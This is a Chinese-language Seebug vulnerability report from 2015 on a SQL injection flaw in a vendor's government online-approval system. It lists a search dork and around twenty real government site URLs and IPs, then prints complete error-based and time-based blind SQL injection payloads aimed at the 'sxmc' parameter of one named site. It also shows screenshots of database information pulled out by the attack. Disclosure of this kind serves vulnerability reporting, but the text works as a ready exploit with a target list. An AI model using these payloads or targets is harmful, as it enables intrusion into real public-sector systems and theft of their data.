某政务系统一处通用SQL注入漏洞(附众多政务案例)

2015-04-14T00:00:00
ID SSV:95832
Type seebug
Reporter Root
Modified 2015-04-14T00:00:00

Description

简要描述:

某政务系统一处通用SQL注入漏洞(附众多政务案例)

详细说明:

系统开发厂商:邯郸市连邦软件发展有限公司 系统架构:ASPX+MSSQL 漏洞文件:workplate/xzsp/tjfx/grbjtj/list.aspx sxmc参数过滤存在问题,导致注入 关键字:inurl:workplate 部分政府案例: 日照市网上审批系统 http://www.rzfwzx.gov.cn/workplate/xzsp/tjfx/grbjtj/list.aspx 保定市网上审批系统 http://www.bdxzfw.cn/workplate/xzsp/tjfx/grbjtj/list.aspx 磁县网上审批系统 http://www.cxxzfwzx.com/workplate/xzsp/tjfx/grbjtj/list.aspx 魏县网上审批系统 http://wxxz.gov.cn/workplate/xzsp/tjfx/grbjtj/list.aspx 邯郸县网上审批系统 http://www.hdxzwzx.com/workplate/xzsp/tjfx/grbjtj/list.aspx 南郊区网上审批系统 http://xz.njqsp.com:8001/workplate/xzsp/tjfx/grbjtj/list.aspx 城区网上审批系统 http://211.142.37.152:81/workplate/xzsp/tjfx/grbjtj/list.aspx 左云县网上审批系统 http://211.142.37.152:88/workplate/xzsp/tjfx/grbjtj/list.aspx 天镇县网上审批系统 http://211.142.37.154:83/workplate/xzsp/tjfx/grbjtj/list.aspx 广灵县网上审批系统 http://211.142.37.152:83/workplate/xzsp/tjfx/grbjtj/list.aspx 新荣区网上审批系统 http://183.203.128.238:82/workplate/xzsp/tjfx/grbjtj/list.aspx 矿区网上审批系统 http://211.142.41.114:82/workplate/xzsp/tjfx/grbjtj/list.aspx 涉县网上审批系统 http://www.hbsxxzfwzx.gov.cn/workplate/xzsp/tjfx/grbjtj/list.aspx 临漳县网上审批系统 http://www.lzxzfwzx.com/workplate/xzsp/tjfx/grbjtj/list.aspx 安新县网上审批系统 http://www.axxzfwzx.com/workplate/xzsp/tjfx/grbjtj/list.aspx 高阳县网上审批系统 http://gyxzfw.net/workplate/xzsp/tjfx/grbjtj/list.aspx 长子县网上审批系统 http://60.220.253.153:81/workplate/xzsp/tjfx/grbjtj/list.aspx 屯留县网上审批系统 http://60.220.240.7/workplate/xzsp/tjfx/grbjtj/list.aspx 浑源县网上审批系统 http://211.142.37.152:85/workplate/xzsp/tjfx/grbjtj/list.aspx 邱县网上审批系统 www.qxxzfwzx.com/workplate/xzsp/tjfx/grbjtj/list.aspx 南郊区网上审批系统 http://xz.njqsp.com:8001/workplate/xzsp/tjfx/grbjtj/list.aspx 大同县网上审批系统 http://211.142.37.152:82/workplate/xzsp/tjfx/grbjtj/list.aspx 等等

漏洞证明:

漏洞验证: 以http://www.rzfwzx.gov.cn/workplate/xzsp/tjfx/grbjtj/list.aspx为例:

```

Place: POST Parameter: sxmc Type: error-based Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause Payload: VIEWSTATE=/wEPDwUKMTg0OTU1NTc4OA9kFgICAw9kFgICDw88KwANAQAPFgQeC18 hRGF0YUJvdW5kZx4LXyFJdGVtQ291bnQCB2QWAmYPZBYSAgEPD2QWBB4Lb25tb3VzZW92ZXIFHnRoaXM uY2xhc3NOYW1lPSdkdk9uTW91c2VPdmVyJx4Kb25tb3VzZW91dAUWdGhpcy5jbGFzc05hbWU9J2R2Um9 3JxYKZg8PFgIeBFRleHQFATFkZAIBDw8WAh8EBQnmib/or7rku7ZkZAICDw8WAh8EBQEwZGQCAw8PFgI fBAUBMGRkAgQPDxYCHwQFATBkZAICDw9kFgQfAgUedGhpcy5jbGFzc05hbWU9J2R2T25Nb3VzZU92ZXI nHwMFF3RoaXMuY2xhc3NOYW1lPSdkdlJvdzInFgpmDw8WAh8EBQEyZGQCAQ8PFgIfBAUJ5Y2z5Yqe5Lu 2ZGQCAg8PFgIfBAUBMGRkAgMPDxYCHwQFATBkZAIEDw8WAh8EBQEwZGQCAw8PZBYEHwIFHnRoaXMuY2x hc3NOYW1lPSdkdk9uTW91c2VPdmVyJx8DBRZ0aGlzLmNsYXNzTmFtZT0nZHZSb3cnFgpmDw8WAh8EBQE zZGQCAQ8PFgIfBAUJ6IGU5Yqe5Lu2ZGQCAg8PFgIfBAUBMGRkAgMPDxYCHwQFATBkZAIEDw8WAh8EBQE wZGQCBA8PZBYEHwIFHnRoaXMuY2xhc3NOYW1lPSdkdk9uTW91c2VPdmVyJx8DBRd0aGlzLmNsYXNzTmF tZT0nZHZSb3cyJxYKZg8PFgIfBAUBNGRkAgEPDxYCHwQFCeS4iuaKpeS7tmRkAgIPDxYCHwQFATBkZAI DDw8WAh8EBQEwZGQCBA8PFgIfBAUBMGRkAgUPD2QWBB8CBR50aGlzLmNsYXNzTmFtZT0nZHZPbk1vdXN lT3ZlcicfAwUWdGhpcy5jbGFzc05hbWU9J2R2Um93JxYKZg8PFgIfBAUBNWRkAgEPDxYCHwQFCeihpeW KnuS7tmRkAgIPDxYCHwQFATBkZAIDDw8WAh8EBQEwZGQCBA8PFgIfBAUBMGRkAgYPD2QWBB8CBR50aGl zLmNsYXNzTmFtZT0nZHZPbk1vdXNlT3ZlcicfAwUXdGhpcy5jbGFzc05hbWU9J2R2Um93MicWCmYPDxY CHwQFATZkZAIBDw8WAh8EBQnnibnlip7ku7ZkZAICDw8WAh8EBQEwZGQCAw8PFgIfBAUBMGRkAgQPDxY CHwQFATBkZAIHDw9kFgQfAgUedGhpcy5jbGFzc05hbWU9J2R2T25Nb3VzZU92ZXInHwMFFnRoaXMuY2x hc3NOYW1lPSdkdlJvdycWCmYPDxYCHwQFATdkZAIBDw8WAh8EBQblkIjorqFkZAICDw8WAh8EBQEwZGQ CAw8PFgIfBAUBMGRkAgQPDxYCHwQFATBkZAIIDw8WAh4HVmlzaWJsZWhkZAIJDw8WAh8FaGQWAmYPZBY GAgEPDxYCHwQFATFkZAIDDw8WAh8EBQExZGQCDQ8PFgIfBAUBMWRkGAEFBmd2TGlzdA88KwAKAQgCAWR GZ7HIi9dZwX KnsTLvaQXbd867A==&VIEWSTATEGENERATOR=D642731C&EVENTVALIDATION=/w EWCAKn0bXBCALvn9qDDQKGuYDVAQKm1eh/AvKBgQgCy5yMGwKM54rGBgLWlM bAsEB5BUsQlzemyARJe p7dQJuaFVP&tbhtml=&sxmc=%' AND 1886=CONVERT(INT,(CHAR(58) CHAR(107) CHAR(100) CH AR(118) CHAR(58) (SELECT (CASE WHEN (1886=1886) THEN CHAR(49) ELSE CHAR(48) END) ) CHAR(58) CHAR(102) CHAR(98) CHAR(118) CHAR(58))) AND '%'='&iptStartAt=&iptEndA t=&P_STARTEND=&btn_search=%E6%9F%A5%E6%89%BE Type: AND/OR time-based blind Title: Microsoft SQL Server/Sybase AND time-based blind (heavy query) Payload: VIEWSTATE=/wEPDwUKMTg0OTU1NTc4OA9kFgICAw9kFgICDw88KwANAQAPFgQeC18 hRGF0YUJvdW5kZx4LXyFJdGVtQ291bnQCB2QWAmYPZBYSAgEPD2QWBB4Lb25tb3VzZW92ZXIFHnRoaXM uY2xhc3NOYW1lPSdkdk9uTW91c2VPdmVyJx4Kb25tb3VzZW91dAUWdGhpcy5jbGFzc05hbWU9J2R2Um9 3JxYKZg8PFgIeBFRleHQFATFkZAIBDw8WAh8EBQnmib/or7rku7ZkZAICDw8WAh8EBQEwZGQCAw8PFgI fBAUBMGRkAgQPDxYCHwQFATBkZAICDw9kFgQfAgUedGhpcy5jbGFzc05hbWU9J2R2T25Nb3VzZU92ZXI nHwMFF3RoaXMuY2xhc3NOYW1lPSdkdlJvdzInFgpmDw8WAh8EBQEyZGQCAQ8PFgIfBAUJ5Y2z5Yqe5Lu 2ZGQCAg8PFgIfBAUBMGRkAgMPDxYCHwQFATBkZAIEDw8WAh8EBQEwZGQCAw8PZBYEHwIFHnRoaXMuY2x hc3NOYW1lPSdkdk9uTW91c2VPdmVyJx8DBRZ0aGlzLmNsYXNzTmFtZT0nZHZSb3cnFgpmDw8WAh8EBQE zZGQCAQ8PFgIfBAUJ6IGU5Yqe5Lu2ZGQCAg8PFgIfBAUBMGRkAgMPDxYCHwQFATBkZAIEDw8WAh8EBQE wZGQCBA8PZBYEHwIFHnRoaXMuY2xhc3NOYW1lPSdkdk9uTW91c2VPdmVyJx8DBRd0aGlzLmNsYXNzTmF tZT0nZHZSb3cyJxYKZg8PFgIfBAUBNGRkAgEPDxYCHwQFCeS4iuaKpeS7tmRkAgIPDxYCHwQFATBkZAI DDw8WAh8EBQEwZGQCBA8PFgIfBAUBMGRkAgUPD2QWBB8CBR50aGlzLmNsYXNzTmFtZT0nZHZPbk1vdXN lT3ZlcicfAwUWdGhpcy5jbGFzc05hbWU9J2R2Um93JxYKZg8PFgIfBAUBNWRkAgEPDxYCHwQFCeihpeW KnuS7tmRkAgIPDxYCHwQFATBkZAIDDw8WAh8EBQEwZGQCBA8PFgIfBAUBMGRkAgYPD2QWBB8CBR50aGl zLmNsYXNzTmFtZT0nZHZPbk1vdXNlT3ZlcicfAwUXdGhpcy5jbGFzc05hbWU9J2R2Um93MicWCmYPDxY CHwQFATZkZAIBDw8WAh8EBQnnibnlip7ku7ZkZAICDw8WAh8EBQEwZGQCAw8PFgIfBAUBMGRkAgQPDxY CHwQFATBkZAIHDw9kFgQfAgUedGhpcy5jbGFzc05hbWU9J2R2T25Nb3VzZU92ZXInHwMFFnRoaXMuY2x hc3NOYW1lPSdkdlJvdycWCmYPDxYCHwQFATdkZAIBDw8WAh8EBQblkIjorqFkZAICDw8WAh8EBQEwZGQ CAw8PFgIfBAUBMGRkAgQPDxYCHwQFATBkZAIIDw8WAh4HVmlzaWJsZWhkZAIJDw8WAh8FaGQWAmYPZBY GAgEPDxYCHwQFATFkZAIDDw8WAh8EBQExZGQCDQ8PFgIfBAUBMWRkGAEFBmd2TGlzdA88KwAKAQgCAWR GZ7HIi9dZwX KnsTLvaQXbd867A==&VIEWSTATEGENERATOR=D642731C&EVENTVALIDATION=/w EWCAKn0bXBCALvn9qDDQKGuYDVAQKm1eh/AvKBgQgCy5yMGwKM54rGBgLWlM bAsEB5BUsQlzemyARJe p7dQJuaFVP&tbhtml=&sxmc=%' AND 1640=(SELECT COUNT(*) FROM sysusers AS sys1,sysus ers AS sys2,sysusers AS sys3,sysusers AS sys4,sysusers AS sys5,sysusers AS sys6, sysusers AS sys7) AND '%'='&iptStartAt=&iptEndAt=&P_STARTEND=&btn_search=%E6%9F% A5%E6%89%BE


```

<img src="https://images.seebug.org/upload/201504/10125806c5e9b0e4f7eeea6a0bafae6309acc761.png" alt="1.png" width="600" onerror="javascript:errimg(this);">

当前数据库信息:

<img src="https://images.seebug.org/upload/201504/101258190b77241f2ac09561af9ac1892c515b8f.png" alt="2.png" width="600" onerror="javascript:errimg(this);">

其他如上!